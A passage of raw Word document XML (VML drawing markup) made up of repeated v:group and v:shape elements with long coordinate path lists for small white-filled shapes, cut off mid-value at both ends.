2215,2663,2215,2667,2215,2671,2215,2674,2215,2678,2215,2682,2215,2686,2215,2690,2215,2694,2215,2698,2215,2703,2215,2707,2215,2712,2215,2716,2215,2721,2215,2726,2215,2731,2215,2736,2215,2741,2215,2746,2215,2751,2215,2756,2215,2762,2215,2767,2215,2773,2215,2779,2215,2785,2215,2791,2215,2797,2215,2803,2215,2809,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2215,2815,2214,2815,2214,2815,2214,2815,2214,2815,2214,2815,2214,2815,2214,2815,2214,2815,2213,2815,2213,2815,2213,2815,2213,2815,2213,2815,2212,2815,2212,2815,2212,2815,2212,2815,2211,2815,2211,2815,2211,2815,2210,2815,2210,2815,2209,2815,2209,2815,2209,2815,2208,2815,2208,2815,2207,2815,2207,2815,2206,2815,2206,2815,2205,2815,2205,2815,2204,2815,2203,2815,2203,2815,2202,2815,2201,2815,2200,2815,2200,2815,2199,2815,2198,2815,2197,2815,2196,2815,2196,2815,2195,2815,2194,2815,2193,2815,2192,2815,2191,2815,2190,2815,2189,2815,2187,2815,2186,2815,2185,2815,2184,2815,2183,2815,2181,2815,2180,2815,2179,2815,2177,2815,2176,2815,2174,2815,2173,2815,2171,2815,2170,2815,2168,2815,2167,2815,2165,2815,2163,2815,2161,2815,2160,2815,2158,2815,2156,2815,2154,2815,2152,2815,2150,2815,2148,2815,2146,2815,2144,2815,2142,2815,2140,2815,2137,2815,2135,2815,2133,2815,2130,2815,2128,2815,2125,2815,2123,2815,2120,2815,2118,2815,2115,2815,2112,2815,2110,2815,2107,2815,2104,2815,2101,2815,2098,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2815,2095,2814,2095,2814,2095,2814,2095,2814,2095,2814,2095,2813,2095,2813,2095,2813,2095,2812,2095,2812,2095,2812,2095,2811,2095,2811,2095,2810,2095,2810,2095,2809,2095,2809,2095,2808,2095,2808,2095,2807,2095,2806,2095,2806,2095,2805,2095,2804,2095,2803,2095,2803,2095,2802,2095,2801,2095,2800,2095,2799,2095,2798,2095,2796,2095,2795,2095,2794,2095,2793,2095,2792,2095,2790,2095,2789,2095,2787,2095,2786,2095,2784,2095,2783,2095,2781,2095,2779,2095,2778,2095,2776,2095,2774,2095,2772,2095,2770,2095,2768,2095,2766,2095,2763,2095,2761,2095,2759,2095,2757,2095,2754,2095,2752,2095,2749,2095,2746,2095,2744,2095,2741,2095,2738,2095,2735,2095,2732,2095,2729,2095,2726,2095,2722,2095,2719,2095,2716,2095,2712,2095,2709,2095,2705,2095,2701,2095,2698,2095,2694,2095,2690,2095,2686,2095,2681,2095,2677,2095,2673,2095,2669,2095,2664,2095,2659,2095,2655,2095,2650,2095,2645,2095,2640,2095,2635,2095,2630,2095,2625,2095,2619,2095,2614,2095,2608,2095,2603,2095,2597,2095,2591,2095,2585,2095,2579,2095,2573,2095,2567,2095,2560e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:145.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,2910" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:2910;width:130;height:250" coordorigin="2070,2910" coordsize="130,250" path="m2095,2920l2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2095,2920,2096,2920,2096,2920,2096,2920,2096,2920,2096,2920,2096,2920,2096,2920,2096,2920,2096,2920,2097,2920,2097,2920,2097,2920,2097,2920,2097,2920,2098,2920,2098,2920,2098,2920,2098,2920,2099,2920,2099,2920,2099,2920,2100,2920,2100,2920,2100,2920,2101,2920,2101,2920,2102,2920,2102,2920,2102,2920,2103,2920,2103,2920,2104,2920,2105,2920,2105,2920,2106,2920,2106,2920,2107,2920,2108,2920,2108,2920,2109,2920,2110,2920,2110,2920,2111,2920,2112,2920,2113,2920,2114,2920,2115,2920,2116,2920,2116,2920,2117,2920,2118,2920,2119,2920,2121,2920,2122,2920,2123,2920,2124,2920,2125,2920,2126,2920,2128,2920,2129,2920,2130,2920,2132,2920,2133,2920,2134,2920,2136,2920,2137,2920,2139,2920,2140,2920,2142,2920,2144,2920,2145,2920,2147,2920,2149,2920,2151,2920,2152,2920,2154,2920,2156,2920,2158,2920,2160,2920,2162,2920,2164,2920,2166,2920,2168,2920,2171,2920,2173,2920,2175,2920,2178,2920,2180,2920,2182,2920,2185,2920,2187,2920,2190,2920,2192,2920,2195,2920,2198,2920,2201,2920,2203,2920,2206,2920,2209,2920,2212,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2920,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2921,2215,2922,2215,2922,2215,2922,2215,2922,2215,2922,2215,2923,2215,2923,2215,2923,2215,2923,2215,2924,2215,2924,2215,2925,2215,2925,2215,2925,2215,2926,2215,2926,2215,2927,2215,2928,2215,2928,2215,2929,2215,2929,2215,2930,2215,2931,2215,2932,2215,2933,2215,2933,2215,2934,2215,2935,2215,2936,2215,2937,2215,2938,2215,2939,2215,2941,2215,2942,2215,2943,2215,2944,2215,2946,2215,2947,2215,2949,2215,2950,2215,2952,2215,2953,2215,2955,2215,2957,2215,2958,2215,2960,2215,2962,2215,2964,2215,2966,2215,2968,2215,2970,2215,2972,2215,2975,2215,2977,2215,2979,2215,2982,2215,2984,2215,2987,2215,2990,2215,2992,2215,2995,2215,2998,2215,3001,2215,3004,2215,3007,2215,3010,2215,3013,2215,3017,2215,3020,2215,3024,2215,3027,2215,3031,2215,3035,2215,3038,2215,3042,2215,3046,2215,3050,2215,3054,2215,3059,2215,3063,2215,3067,2215,3072,2215,3076,2215,3081,2215,3086,2215,3091,2215,3096,2215,3101,2215,3106,2215,3111,2215,3117,2215,3122,2215,3128,2215,3133,2215,3139,2215,3145,2215,3151,2215,3157,2215,3163,2215,3169,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2215,3176,2214,3176,2214,3176,2214,3176,2214,3176,2214,3176,2214,3176,2214,3176,2214,3176,2213,3176,2213,3176,2213,3176,2213,3176,2213,3176,2212,3176,2212,3176,2212,3176,2212,3176,2211,3176,2211,3176,2211,3176,2210,3176,2210,3176,2209,3176,2209,3176,2209,3176,2208,3176,2208,3176,2207,3176,2207,3176,2206,3176,2206,3176,2205,3176,2205,3176,2204,3176,2203,3176,2203,3176,2202,3176,2201,3176,2200,3176,2200,3176,2199,3176,2198,3176,2197,3176,2196,3176,2196,3176,2195,3176,2194,3176,2193,3176,2192,3176,2191,3176,2190,3176,2189,3176,2187,3176,2186,3176,2185,3176,2184,3176,2183,3176,2181,3176,2180,3176,2179,3176,2177,3176,2176,3176,2174,3176,2173,3176,2171,3176,2170,3176,2168,3176,2167,3176,2165,3176,2163,3176,2161,3176,2160,3176,2158,3176,2156,3176,2154,3176,2152,3176,2150,3176,2148,3176,2146,3176,2144,3176,2142,3176,2140,3176,2137,3176,2135,3176,2133,3176,2130,3176,2128,3176,2125,3176,2123,3176,2120,3176,2118,3176,2115,3176,2112,3176,2110,3176,2107,3176,2104,3176,2101,3176,2098,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3176,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3175,2095,3174,2095,3174,2095,3174,2095,3174,2095,3174,2095,3173,2095,3173,2095,3173,2095,3172,2095,3172,2095,3172,2095,3171,2095,3171,2095,3170,2095,3170,2095,3169,2095,3169,2095,3168,2095,3167,2095,3167,2095,3166,2095,3165,2095,3164,2095,3164,2095,3163,2095,3162,2095,3161,2095,3160,2095,3159,2095,3158,2095,3157,2095,3156,2095,3154,2095,3153,2095,3152,2095,3150,2095,3149,2095,3148,2095,3146,2095,3145,2095,3143,2095,3141,2095,3140,2095,3138,2095,3136,2095,3134,2095,3132,2095,3130,2095,3128,2095,3126,2095,3124,2095,3121,2095,3119,2095,3117,2095,3114,2095,3112,2095,3109,2095,3106,2095,3104,2095,3101,2095,3098,2095,3095,2095,3092,2095,3089,2095,3086,2095,3083,2095,3079,2095,3076,2095,3072,2095,3069,2095,3065,2095,3062,2095,3058,2095,3054,2095,3050,2095,3046,2095,3042,2095,3037,2095,3033,2095,3029,2095,3024,2095,3020,2095,3015,2095,3010,2095,3005,2095,3000,2095,2995,2095,2990,2095,2985,2095,2980,2095,2974,2095,2969,2095,2963,2095,2957,2095,2951,2095,2945,2095,2939,2095,2933,2095,2927,2095,2920e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:391.500pt;margin-top:145.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7830,2910" coordsize="130,250">
        <v:shape style="position:absolute;left:7830;top:2910;width:130;height:250" coordorigin="7830,2910" coordsize="130,250" path="m7858,2920l7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7858,2920,7859,2920,7859,2920,7859,2920,7859,2920,7859,2920,7859,2920,7859,2920,7859,2920,7860,2920,7860,2920,7860,2920,7860,2920,7860,2920,7861,2920,7861,2920,7861,2920,7861,2920,7862,2920,7862,2920,7862,2920,7863,2920,7863,2920,7863,2920,7864,2920,7864,2920,7864,2920,7865,2920,7865,2920,7866,2920,7866,2920,7867,2920,7867,2920,7868,2920,7869,2920,7869,2920,7870,2920,7870,2920,7871,2920,7872,2920,7873,2920,7873,2920,7874,2920,7875,2920,7876,2920,7877,2920,7878,2920,7878,2920,7879,2920,7880,2920,7881,2920,7882,2920,7883,2920,7885,2920,7886,2920,7887,2920,7888,2920,7889,2920,7890,2920,7892,2920,7893,2920,7894,2920,7896,2920,7897,2920,7899,2920,7900,2920,7902,2920,7903,2920,7905,2920,7907,2920,7908,2920,7910,2920,7912,2920,7913,2920,7915,2920,7917,2920,7919,2920,7921,2920,7923,2920,7925,2920,7927,2920,7929,2920,7931,2920,7934,2920,7936,2920,7938,2920,7940,2920,7943,2920,7945,2920,7948,2920,7950,2920,7953,2920,7955,2920,7958,2920,7961,2920,7964,2920,7966,2920,7969,2920,7972,2920,7975,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2921,7978,2922,7978,2922,7978,2922,7978,2922,7978,2922,7978,2923,7978,2923,7978,2923,7978,2923,7978,2924,7978,2924,7978,2925,7978,2925,7978,2925,7978,2926,7978,2926,7978,2927,7978,2928,7978,2928,7978,2929,7978,2929,7978,2930,7978,2931,7978,2932,7978,2933,7978,2933,7978,2934,7978,2935,7978,2936,7978,2937,7978,2938,7978,2939,7978,2941,7978,2942,7978,2943,7978,2944,7978,2946,7978,2947,7978,2949,7978,2950,7978,2952,7978,2953,7978,2955,7978,2957,7978,2958,7978,2960,7978,2962,7978,2964,7978,2966,7978,2968,7978,2970,7978,2972,7978,2975,7978,2977,7978,2979,7978,2982,7978,2984,7978,2987,7978,2990,7978,2992,7978,2995,7978,2998,7978,3001,7978,3004,7978,3007,7978,3010,7978,3013,7978,3017,7978,3020,7978,3024,7978,3027,7978,3031,7978,3035,7978,3038,7978,3042,7978,3046,7978,3050,7978,3054,7978,3059,7978,3063,7978,3067,7978,3072,7978,3076,7978,3081,7978,3086,7978,3091,7978,3096,7978,3101,7978,3106,7978,3111,7978,3117,7978,3122,7978,3128,7978,3133,7978,3139,7978,3145,7978,3151,7978,3157,7978,3163,7978,3169,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7977,3176,7977,3176,7977,3176,7977,3176,7977,3176,7977,3176,7977,3176,7977,3176,7976,3176,7976,3176,7976,3176,7976,3176,7976,3176,7975,3176,7975,3176,7975,3176,7975,3176,7974,3176,7974,3176,7974,3176,7973,3176,7973,3176,7973,3176,7972,3176,7972,3176,7972,3176,7971,3176,7971,3176,7970,3176,7970,3176,7969,3176,7969,3176,7968,3176,7967,3176,7967,3176,7966,3176,7966,3176,7965,3176,7964,3176,7963,3176,7963,3176,7962,3176,7961,3176,7960,3176,7959,3176,7958,3176,7958,3176,7957,3176,7956,3176,7955,3176,7954,3176,7953,3176,7951,3176,7950,3176,7949,3176,7948,3176,7947,3176,7945,3176,7944,3176,7943,3176,7942,3176,7940,3176,7939,3176,7937,3176,7936,3176,7934,3176,7933,3176,7931,3176,7929,3176,7928,3176,7926,3176,7924,3176,7923,3176,7921,3176,7919,3176,7917,3176,7915,3176,7913,3176,7911,3176,7909,3176,7907,3176,7905,3176,7902,3176,7900,3176,7898,3176,7896,3176,7893,3176,7891,3176,7888,3176,7886,3176,7883,3176,7881,3176,7878,3176,7875,3176,7872,3176,7870,3176,7867,3176,7864,3176,7861,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3176,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3175,7858,3174,7858,3174,7858,3174,7858,3174,7858,3174,7858,3173,7858,3173,7858,3173,7858,3172,7858,3172,7858,3172,7858,3171,7858,3171,7858,3170,7858,3170,7858,3169,7858,3169,7858,3168,7858,3167,7858,3167,7858,3166,7858,3165,7858,3164,7858,3164,7858,3163,7858,3162,7858,3161,7858,3160,7858,3159,7858,3158,7858,3157,7858,3156,7858,3154,7858,3153,7858,3152,7858,3150,7858,3149,7858,3148,7858,3146,7858,3145,7858,3143,7858,3141,7858,3140,7858,3138,7858,3136,7858,3134,7858,3132,7858,3130,7858,3128,7858,3126,7858,3124,7858,3121,7858,3119,7858,3117,7858,3114,7858,3112,7858,3109,7858,3106,7858,3104,7858,3101,7858,3098,7858,3095,7858,3092,7858,3089,7858,3086,7858,3083,7858,3079,7858,3076,7858,3072,7858,3069,7858,3065,7858,3062,7858,3058,7858,3054,7858,3050,7858,3046,7858,3042,7858,3037,7858,3033,7858,3029,7858,3024,7858,3020,7858,3015,7858,3010,7858,3005,7858,3000,7858,2995,7858,2990,7858,2985,7858,2980,7858,2974,7858,2969,7858,2963,7858,2957,7858,2951,7858,2945,7858,2939,7858,2933,7858,2927,7858,2920e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:397.500pt;margin-top:145.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7950,2910" coordsize="130,250">
        <v:shape style="position:absolute;left:7950;top:2910;width:130;height:250" coordorigin="7950,2910" coordsize="130,250" path="m7978,2920l7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7978,2920,7979,2920,7979,2920,7979,2920,7979,2920,7979,2920,7979,2920,7979,2920,7979,2920,7979,2920,7980,2920,7980,2920,7980,2920,7980,2920,7980,2920,7981,2920,7981,2920,7981,2920,7981,2920,7982,2920,7982,2920,7982,2920,7983,2920,7983,2920,7983,2920,7984,2920,7984,2920,7985,2920,7985,2920,7985,2920,7986,2920,7986,2920,7987,2920,7987,2920,7988,2920,7989,2920,7989,2920,7990,2920,7991,2920,7991,2920,7992,2920,7993,2920,7993,2920,7994,2920,7995,2920,7996,2920,7997,2920,7998,2920,7999,2920,7999,2920,8000,2920,8001,2920,8002,2920,8004,2920,8005,2920,8006,2920,8007,2920,8008,2920,8009,2920,8011,2920,8012,2920,8013,2920,8014,2920,8016,2920,8017,2920,8019,2920,8020,2920,8022,2920,8023,2920,8025,2920,8027,2920,8028,2920,8030,2920,8032,2920,8033,2920,8035,2920,8037,2920,8039,2920,8041,2920,8043,2920,8045,2920,8047,2920,8049,2920,8051,2920,8054,2920,8056,2920,8058,2920,8060,2920,8063,2920,8065,2920,8068,2920,8070,2920,8073,2920,8075,2920,8078,2920,8081,2920,8084,2920,8086,2920,8089,2920,8092,2920,8095,2920,8098,2920,8098,2920,8098,2920,8098,2920,8098,2920,8098,2920,8098,2920,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2921,8098,2922,8098,2922,8098,2922,8098,2922,8098,2922,8098,2923,8098,2923,8098,2923,8098,2923,8098,2924,8098,2924,8098,2925,8098,2925,8098,2925,8098,2926,8098,2926,8098,2927,8098,2928,8098,2928,8098,2929,8098,2929,8098,2930,8098,2931,8098,2932,8098,2933,8098,2933,8098,2934,8098,2935,8098,2936,8098,2937,8098,2938,8098,2939,8098,2941,8098,2942,8098,2943,8098,2944,8098,2946,8098,2947,8098,2949,8098,2950,8098,2952,8098,2953,8098,2955,8098,2957,8098,2958,8098,2960,8098,2962,8098,2964,8098,2966,8098,2968,8098,2970,8098,2972,8098,2975,8098,2977,8098,2979,8098,2982,8098,2984,8098,2987,8098,2990,8098,2992,8098,2995,8098,2998,8098,3001,8098,3004,8098,3007,8098,3010,8098,3013,8098,3017,8098,3020,8098,3024,8098,3027,8098,3031,8098,3035,8098,3038,8098,3042,8098,3046,8098,3050,8098,3054,8098,3059,8098,3063,8098,3067,8098,3072,8098,3076,8098,3081,8098,3086,8098,3091,8098,3096,8098,3101,8098,3106,8098,3111,8098,3117,8098,3122,8098,3128,8098,3133,8098,3139,8098,3145,8098,3151,8098,3157,8098,3163,8098,3169,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8098,3176,8097,3176,8097,3176,8097,3176,8097,3176,8097,3176,8097,3176,8097,3176,8097,3176,8096,3176,8096,3176,8096,3176,8096,3176,8096,3176,8095,3176,8095,3176,8095,3176,8094,3176,8094,3176,8094,3176,8094,3176,8093,3176,8093,3176,8092,3176,8092,3176,8092,3176,8091,3176,8091,3176,8090,3176,8090,3176,8089,3176,8089,3176,8088,3176,8087,3176,8087,3176,8086,3176,8086,3176,8085,3176,8084,3176,8083,3176,8083,3176,8082,3176,8081,3176,8080,3176,8079,3176,8079,3176,8078,3176,8077,3176,8076,3176,8075,3176,8074,3176,8073,3176,8071,3176,8070,3176,8069,3176,8068,3176,8067,3176,8066,3176,8064,3176,8063,3176,8062,3176,8060,3176,8059,3176,8057,3176,8056,3176,8054,3176,8053,3176,8051,3176,8050,3176,8048,3176,8046,3176,8044,3176,8043,3176,8041,3176,8039,3176,8037,3176,8035,3176,8033,3176,8031,3176,8029,3176,8027,3176,8025,3176,8022,3176,8020,3176,8018,3176,8016,3176,8013,3176,8011,3176,8008,3176,8006,3176,8003,3176,8001,3176,7998,3176,7995,3176,7993,3176,7990,3176,7987,3176,7984,3176,7981,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3176,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3175,7978,3174,7978,3174,7978,3174,7978,3174,7978,3174,7978,3173,7978,3173,7978,3173,7978,3172,7978,3172,7978,3172,7978,3171,7978,3171,7978,3170,7978,3170,7978,3169,7978,3169,7978,3168,7978,3167,7978,3167,7978,3166,7978,3165,7978,3164,7978,3164,7978,3163,7978,3162,7978,3161,7978,3160,7978,3159,7978,3158,7978,3157,7978,3156,7978,3154,7978,3153,7978,3152,7978,3150,7978,3149,7978,3148,7978,3146,7978,3145,7978,3143,7978,3141,7978,3140,7978,3138,7978,3136,7978,3134,7978,3132,7978,3130,7978,3128,7978,3126,7978,3124,7978,3121,7978,3119,7978,3117,7978,3114,7978,3112,7978,3109,7978,3106,7978,3104,7978,3101,7978,3098,7978,3095,7978,3092,7978,3089,7978,3086,7978,3083,7978,3079,7978,3076,7978,3072,7978,3069,7978,3065,7978,3062,7978,3058,7978,3054,7978,3050,7978,3046,7978,3042,7978,3037,7978,3033,7978,3029,7978,3024,7978,3020,7978,3015,7978,3010,7978,3005,7978,3000,7978,2995,7978,2990,7978,2985,7978,2980,7978,2974,7978,2969,7978,2963,7978,2957,7978,2951,7978,2945,7978,2939,7978,2933,7978,2927,7978,2920e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:127.500pt;margin-top:158.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2550,3170" coordsize="130,270">
        <v:shape style="position:absolute;left:2550;top:3170;width:130;height:270" coordorigin="2550,3170" coordsize="130,270" path="m2560,3191l2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2560,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2561,3191,2562,3191,2562,3191,2562,3191,2562,3191,2562,3191,2562,3191,2563,3191,2563,3191,2563,3191,2563,3191,2564,3191,2564,3191,2564,3191,2565,3191,2565,3191,2565,3191,2566,3191,2566,3191,2566,3191,2567,3191,2567,3191,2568,3191,2568,3191,2569,3191,2569,3191,2570,3191,2570,3191,2571,3191,2572,3191,2572,3191,2573,3191,2573,3191,2574,3191,2575,3191,2576,3191,2576,3191,2577,3191,2578,3191,2579,3191,2580,3191,2581,3191,2582,3191,2583,3191,2584,3191,2585,3191,2586,3191,2587,3191,2588,3191,2589,3191,2590,3191,2592,3191,2593,3191,2594,3191,2595,3191,2597,3191,2598,3191,2600,3191,2601,3191,2603,3191,2604,3191,2606,3191,2607,3191,2609,3191,2611,3191,2612,3191,2614,3191,2616,3191,2618,3191,2619,3191,2621,3191,2623,3191,2625,3191,2627,3191,2629,3191,2632,3191,2634,3191,2636,3191,2638,3191,2640,3191,2643,3191,2645,3191,2648,3191,2650,3191,2653,3191,2655,3191,2658,3191,2660,3191,2663,3191,2666,3191,2669,3191,2671,3191,2674,3191,2677,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3191,2680,3192,2680,3192,2680,3192,2680,3192,2680,3192,2680,3193,2680,3193,2680,3193,2680,3194,2680,3194,2680,3194,2680,3195,2680,3195,2680,3196,2680,3196,2680,3197,2680,3197,2680,3198,2680,3198,2680,3199,2680,3200,2680,3200,2680,3201,2680,3202,2680,3203,2680,3204,2680,3204,2680,3205,2680,3206,2680,3207,2680,3208,2680,3210,2680,3211,2680,3212,2680,3213,2680,3214,2680,3216,2680,3217,2680,3219,2680,3220,2680,3222,2680,3223,2680,3225,2680,3227,2680,3228,2680,3230,2680,3232,2680,3234,2680,3236,2680,3238,2680,3240,2680,3243,2680,3245,2680,3247,2680,3250,2680,3252,2680,3254,2680,3257,2680,3260,2680,3262,2680,3265,2680,3268,2680,3271,2680,3274,2680,3277,2680,3280,2680,3284,2680,3287,2680,3290,2680,3294,2680,3297,2680,3301,2680,3305,2680,3308,2680,3312,2680,3316,2680,3320,2680,3325,2680,3329,2680,3333,2680,3338,2680,3342,2680,3347,2680,3351,2680,3356,2680,3361,2680,3366,2680,3371,2680,3376,2680,3381,2680,3387,2680,3392,2680,3398,2680,3403,2680,3409,2680,3415,2680,3421,2680,3427,2680,3433,2680,3439,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2680,3446,2679,3446,2679,3446,2679,3446,2679,3446,2679,3446,2679,3446,2679,3446,2678,3446,2678,3446,2678,3446,2678,3446,2678,3446,2677,3446,2677,3446,2677,3446,2676,3446,2676,3446,2676,3446,2675,3446,2675,3446,2675,3446,2674,3446,2674,3446,2673,3446,2673,3446,2672,3446,2672,3446,2671,3446,2671,3446,2670,3446,2670,3446,2669,3446,2668,3446,2668,3446,2667,3446,2666,3446,2666,3446,2665,3446,2664,3446,2663,3446,2663,3446,2662,3446,2661,3446,2660,3446,2659,3446,2658,3446,2657,3446,2656,3446,2655,3446,2654,3446,2653,3446,2651,3446,2650,3446,2649,3446,2648,3446,2647,3446,2645,3446,2644,3446,2642,3446,2641,3446,2640,3446,2638,3446,2637,3446,2635,3446,2633,3446,2632,3446,2630,3446,2628,3446,2627,3446,2625,3446,2623,3446,2621,3446,2619,3446,2617,3446,2615,3446,2613,3446,2611,3446,2609,3446,2607,3446,2605,3446,2602,3446,2600,3446,2598,3446,2595,3446,2593,3446,2591,3446,2588,3446,2586,3446,2583,3446,2580,3446,2578,3446,2575,3446,2572,3446,2569,3446,2566,3446,2563,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3446,2560,3445,2560,3445,2560,3445,2560,3445,2560,3445,2560,3445,2560,3445,2560,3445,2560,3445,2560,3444,2560,3444,2560,3444,2560,3444,2560,3443,2560,3443,2560,3443,2560,3442,2560,3442,2560,3442,2560,3441,2560,3441,2560,3440,2560,3440,2560,3439,2560,3439,2560,3438,2560,3437,2560,3437,2560,3436,2560,3435,2560,3435,2560,3434,2560,3433,2560,3432,2560,3431,2560,3430,2560,3429,2560,3428,2560,3427,2560,3426,2560,3424,2560,3423,2560,3422,2560,3421,2560,3419,2560,3418,2560,3416,2560,3415,2560,3413,2560,3411,2560,3410,2560,3408,2560,3406,2560,3404,2560,3402,2560,3400,2560,3398,2560,3396,2560,3394,2560,3392,2560,3389,2560,3387,2560,3384,2560,3382,2560,3379,2560,3377,2560,3374,2560,3371,2560,3368,2560,3365,2560,3362,2560,3359,2560,3356,2560,3353,2560,3349,2560,3346,2560,3343,2560,3339,2560,3335,2560,3332,2560,3328,2560,3324,2560,3320,2560,3316,2560,3312,2560,3308,2560,3303,2560,3299,2560,3294,2560,3290,2560,3285,2560,3280,2560,3275,2560,3270,2560,3265,2560,3260,2560,3255,2560,3250,2560,3244,2560,3239,2560,3233,2560,3227,2560,3221,2560,3215,2560,3209,2560,3203,2560,3197,2560,3191e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:145.500pt;margin-top:158.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2910,3170" coordsize="130,270">
        <v:shape style="position:absolute;left:2910;top:3170;width:130;height:270" coordorigin="2910,3170" coordsize="130,270" path="m2920,3191l2920,3191,2920,3191,2920,3191,2920,3191,2920,3191,2920,3191,2920,3191,2920,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2921,3191,2922,3191,2922,3191,2922,3191,2922,3191,2922,3191,2922,3191,2923,3191,2923,3191,2923,3191,2923,3191,2924,3191,2924,3191,2924,3191,2924,3191,2925,3191,2925,3191,2925,3191,2926,3191,2926,3191,2927,3191,2927,3191,2927,3191,2928,3191,2928,3191,2929,3191,2929,3191,2930,3191,2930,3191,2931,3191,2932,3191,2932,3191,2933,3191,2934,3191,2934,3191,2935,3191,2936,3191,2937,3191,2937,3191,2938,3191,2939,3191,2940,3191,2941,3191,2942,3191,2943,3191,2944,3191,2945,3191,2946,3191,2947,3191,2948,3191,2949,3191,2951,3191,2952,3191,2953,3191,2954,3191,2956,3191,2957,3191,2958,3191,2960,3191,2961,3191,2963,3191,2964,3191,2966,3191,2967,3191,2969,3191,2971,3191,2972,3191,2974,3191,2976,3191,2978,3191,2980,3191,2982,3191,2984,3191,2985,3191,2988,3191,2990,3191,2992,3191,2994,3191,2996,3191,2998,3191,3001,3191,3003,3191,3005,3191,3008,3191,3010,3191,3013,3